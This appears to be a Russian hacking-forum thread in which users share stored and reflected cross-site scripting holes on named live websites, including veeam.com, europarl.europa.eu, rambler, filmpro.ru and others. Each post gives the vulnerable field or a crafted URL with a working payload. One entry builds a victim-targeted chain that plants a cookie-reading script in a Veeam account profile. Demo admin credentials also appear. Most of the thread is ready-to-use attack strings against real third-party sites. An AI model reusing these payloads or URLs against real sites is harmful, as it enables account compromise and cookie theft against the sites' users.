Code: http://www.isdera.de/dia_auto_cw.php?delay=10000&dia=27%22%20%3C/form%3E%20%3C/input%3E%3Ch1%3EXSS%20attack%20--GhostW%20aka%20Sepo--%3C/h1%3E http://en.wikipedia.org/wiki/File:Isdera_imperator_1.jpg
vk.com и Википедия. Пассивка, но все равно решил запостить. В Вики аналогично, уязвим любой ресурс с возможностью загрузки и исполнения файла с форматом .svg
filmpro.ru - социальная киносеть Яндекс тИЦ 1100 Google Page Rank 6/10 Суточная посещаемость 37К юзеров Редактируем профиль - Уязвимые поля "Инересы","Работа" и "Образование" Либо Моё фото - Создать альбом - Уязвимое поле "Название"
Сooksa.ru - Социальная сеть для кулинаров. Code: Яндекс тИЦ (CY) 180 +20 Alexa Rank 163,311 -4,693 Google PageRank (PR) 4 Жмё на кнопку "Добавить рецепт" , далее запиливаем ядовитый рецепт =) Уязвимые параметры: Ингредиент Примечание
Kasima.com Уязвимое поле "Статус" <script>alert('xss')</script> Уязвимое поле "Имя" Работает в сообщениях
Активная XSS на демо портале блога http://demo.nibbleblog.com/ 1. Зайти в админку : http://demo.nibbleblog.com/admin.php логин;пароль: admin ; demo 2. Создать любую запись, в поле короткой ссылки написать: "></a></li></ul><script>alert("Antichat.test"); </script> 3. Уязвимость во многих местах движка присутствует .
Вот https://web.pechkin-mail.ru/ Форма регистрации. Вроде бы все поля =) Code: "><script>alert()</script> [code]
Была найдена случайно в поле поиске книг XSS Прямая ссылка и XSS: europarl.europa.eu/100books/en/list.html Code: "></script><sc""><marquee><H1>xss vuln found</H1></marquee><br /><center><IMG src="http://db.tt/E7dH5HLR"></center></script> joinup.ec.europa.eu/svn/ Весьма интересна)
тиц/пр: 550/6 url: https://www.veeam.com/account-edit-profile.html Code: <script>alert(123);</script> Уязвимое поле - Title, но через инпут не записать, так как валидация. XSRF тоже не провести, так как xmlhttprequest. Так что, если сам себе - подменяем запрос. Ну, а злоумышленник может записать жертве через пассивку - Code: https://www.veeam.com/inj.html";a="script";$.ajax(%7Btype:"POST",url:"/change_field/",data:"val=injected<"+a+">alert(document.cookie);</"+a+">%7Cjob_description%7CR%2CSymbol%2CMax",dataType:"json",async:!1%7D);window.location="/account-edit-profile.html"</script>
Выложу несколько сайтов, может кому и пригодится. Ведь на рамблере молчат значит все равно на багу. Code: http://nova.rambler.ru/search?query=%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E&filter=%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm%281%29%3E Code: http://www.rfbr.ru/rffi/ru/search/?query=%C6%F3%F0%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E%E1%E8%ED%E0 Code: http://www.muztorg.ru/search/?query=%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E Code: http://www.mcx.ru/fts/search?query=%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E
